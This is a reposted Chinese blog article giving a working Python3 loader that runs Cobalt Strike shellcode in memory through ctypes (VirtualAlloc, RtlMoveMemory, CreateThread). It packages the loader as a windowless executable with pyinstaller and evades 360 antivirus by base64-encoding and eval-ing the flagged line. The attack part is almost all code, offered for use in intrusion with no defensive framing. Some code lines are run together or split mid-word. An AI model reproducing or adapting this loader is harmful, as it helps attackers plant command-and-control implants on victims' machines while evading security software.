1. 首页
  2. 文章中心
  3. 内网渗透

Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒

54 阅读 0 评论
我是靠谱客的博主 饱满玉米,最近开发中收集的这篇文章主要介绍Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

Python2.7 现在很多杀毒软件都会查杀 免杀效果有点差。可以使用 python3 来做 shellcode 的免杀处理。 

Python3 下载 下载最新的版本 当前实验的版本是 Python 3.8.6 64  pyinstaller 4.0 https://www.python.org/downloads/ pip install pyinstaller  

Python3 shellcode 加载代码 import ctypes

 

#shellcode 加载 

def shellCodeLoad(shellcode): 
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64     ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))     buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(sh ellcode)))     handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))     ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1)) 
 
if __name__ == "__main__": 
    shellCodeLoad(bytearray(b'shellcode'))

 

 

编译 pyinstaller -F test.py --noconsole

 

 

有时候杀毒软件会查杀这一段代码

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(sh ellcode)))

可以使用编码进行处理 eval 动态执行代码 

eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVu
KHNoZWxsY29kZSkpKQ=="))

Python3 shellcode 加载代码 import ctypes import base64

#shellcode 加载 

def shellCodeLoad(shellcode): 
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64     ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))     buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) 
    
eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVu KHNoZWxsY29kZSkpKQ==")) 
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))     ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1)) if __name__ == "__main__": 
    shellCodeLoad(bytearray(b'shellcode'))

 

最后

以上就是饱满玉米为你收集整理的Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒的全部内容,希望文章能够帮你解决Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(36)

相关文章

Liunx连接finalShell安装配置前言一、虚拟机安装链接二、虚拟机配置连接步骤
Liunx连接finalShell安装配置前言一、虚拟机安装链接二、虚拟机配置连接步骤
如何使用ssh工具Finalshell连接VirtualBox本地虚拟机
如何使用ssh工具Finalshell连接VirtualBox本地虚拟机
VMware中Linux配置FinalShell连接
VMware中Linux配置FinalShell连接
linux ipv6链接远程,linux – TCP / IPv6通过ssh隧道
linux ipv6链接远程,linux – TCP / IPv6通过ssh隧道
Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒
Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒
Cobalt编译流程分析
Cobalt编译流程分析
FinalShell - 一个免费且好用的ssh工具一.FinalShell介绍二.初步使用
FinalShell - 一个免费且好用的ssh工具一.FinalShell介绍二.初步使用
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第八章 windows常见特洛伊木马任务(2)截屏黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第八章 windows常见特洛伊木马任务(2)截屏写在前面创建screenshotter.py脚本小试牛刀
黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第八章 windows常见特洛伊木马任务(2)截屏黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第八章 windows常见特洛伊木马任务(2)截屏写在前面创建screenshotter.py脚本小试牛刀

评论列表共有 0 条评论

立即
投稿
返回
顶部